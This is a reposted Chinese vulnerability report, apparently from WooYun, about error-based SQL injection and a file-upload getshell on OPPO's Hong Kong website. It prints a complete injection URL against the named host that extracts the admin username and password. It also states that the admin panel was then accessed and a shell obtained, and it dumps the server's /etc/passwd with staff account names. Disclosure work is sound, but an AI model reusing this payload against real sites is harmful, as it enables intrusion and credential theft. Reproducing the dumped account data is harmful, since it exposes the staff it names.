神刀安全网

漏洞标题: OPPO手机hk主站报错SQL注入(已Getshell)

漏洞详情

披露状态:

2016-05-29: 细节已通知厂商并且等待厂商处理中
2016-05-29: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

oppo手机hk主站报错注入(已getshell)

详细说明:

mask 区域
1.http://**.**.**//club_register.phpact=check_username&username=aa

报错注入

漏洞标题:  OPPO手机hk主站报错SQL注入(已Getshell)

code 区域
http://www.oppodigital.com.hk//club_register.php?act=check_username&username=aa' 
AND (SELECT 4089 FROM(SELECT COUNT(*),CONCAT(0x7162767071,(select concat(0x23,
0x23,username,0x23,0x23,password,0x23,0x23) from bd_admin where id=1 limit 1),0x7176716b71,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'gyjt'='gyjt

注入得到数据登陆后台

漏洞标题:  OPPO手机hk主站报错SQL注入(已Getshell)

存在任意文件上传 getshell

漏洞标题:  OPPO手机hk主站报错SQL注入(已Getshell)

code 区域
nginx:x:105:107:nginx user,,,:/nonexistent:/bin/false

mysql:x:106:108:MySQL Server,,,:/nonexistent:/bin/false

messagebus:x:107:109::/var/run/dbus:/bin/false

#xtjiao:x:1003:1003:,,,:/home/xtjiao:/bin/bash

#zwzheng:x:1004:1004:,,,:/home/zwzheng:/bin/bash

syncer:x:1005:1005:,,,:/home/syncer:/bin/bash

sphinxsearch:x:108:110:Sphinx fulltext search service,,,:/var/run/sphinxsearch:/bin/false

redis:x:109:111:redis server,,,:/var/lib/redis:/bin/false

hwang:x:1006:1006:,,,:/home/hwang:/bin/bash

lchen:x:1007:1007:,,,:/home/lchen:/bin/bash

hbai:x:1002:1009:,,,:/home/hbai:/bin/bash

avahi:x:110:112:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false

tomcat55:x:111:65534::/usr/share/tomcat5.5:/bin/false

mjzhou:x:1000:1008:,,,:/home/mjzhou:/bin/bash

qxu:x:1003:1010:,,,:/home/qxu:/bin/bash

wjzhu:x:1004:1011:,,,:/home/wjzhu:/bin/bash

cywang:x:1008:1012:,,,:/home/cywang:/bin/bash

zjli:x:1009:1013::/home/zjli:/bin/sh

yfhu:x:1010:1014::/home/yfhu:/bin/sh

ljni:x:1011:1015::/home/ljni:/bin/sh

漏洞证明:

已经证明

修复方案:

版权声明:转载请注明来源 S1mba_辛巴@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: OPPO手机hk主站报错SQL注入(已Getshell)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址